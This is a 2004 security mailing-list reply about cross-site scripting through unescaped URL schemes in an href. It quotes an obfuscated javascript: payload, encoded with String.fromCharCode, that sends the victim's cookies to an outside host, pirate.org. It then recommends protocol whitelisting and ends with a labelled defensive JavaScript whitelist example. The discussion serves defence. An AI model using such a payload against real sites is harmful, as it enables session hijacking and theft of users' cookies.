WebApp Sec mailing list archives
Re: [Re: AppSec FAQ at OWASP]
From: Ulf Härnhammar <Ulf.Harnhammar.9485 () student uu se>
Date: Fri, 30 Jan 2004 14:58:32 +0100
Quoting Philippe Prados <pprados () club-internet fr>:
No. It's not correct. With this code:
<a href="<%= escapeHTML(url)%>/doc.html">Document</a>
The hacker can inject into the variable url the value:
javascript:eval(String.fromCharCode(60,115,99,114,105,112,116,62,110,101,119,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,112,105,114,97,116,101,46,111,114,103,47,118,111,108,101,99,111,111,107,105,101,46,106,115,112,63,99,61,34,43,101,115,99,97,112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62))
and execute a script without <, > or &!
In general, allowing arbitrary protocols in URLs is a mistake. My HTML filter kses (plug, plug) has a whitelisting URL protocol function that only allows certain protocols in URLs. You can tell it to keep http, https, ftp, mailto and news, and remove all others. See http://sourceforge.net/projects/kses for more information.

--
Ulf Härnhammar
student, Uppsala universitet
editor, idiosynkratisk ( http://labben.abm.uu.se/~ulha9485/idiosynkratisk/ )
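As an added example (not kses itself, and not the JSP from the quoted message), the JavaScript below shows why escapeHTML() alone lets a javascript: value through the href and how a protocol whitelist of the kind described rejects it before escaping. The function names, the relative-URL handling and the allowed-scheme list (http, https, ftp, mailto, news, as in the post) are assumptions for this example.

```javascript
// Added example, not from kses or the thread's JSP. Names are assumed.
const ALLOWED_SCHEMES = new Set(["http", "https", "ftp", "mailto", "news"]);

// Escape the HTML-significant characters. Right for text and attribute
// values, but it says nothing about which URL scheme the value carries,
// which is why the quoted javascript: payload survives it untouched.
function escapeHTML(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Return the URL's scheme lower-cased, or null for a relative URL.
// Browsers drop ASCII whitespace/control characters around and inside the
// scheme and compare it case-insensitively, so do the same before matching;
// otherwise "java\tscript:" or " JavaScript:" would slip past the check.
function urlScheme(url) {
  const cleaned = String(url).replace(/[\u0000-\u0020]/g, "");
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// Whitelist check in the spirit of kses: relative URLs and the listed
// schemes pass; everything else (javascript:, data:, vbscript:, ...) fails.
function isAllowedUrl(url) {
  const scheme = urlScheme(url);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// The anchor from the thread, done in the right order: validate the scheme
// first, then HTML-escape. A rejected URL is replaced by an empty string so
// the link degrades to /doc.html instead of carrying attacker input.
function renderDocLink(url) {
  const href = isAllowedUrl(url) ? url : "";
  return `<a href="${escapeHTML(href)}/doc.html">Document</a>`;
}
```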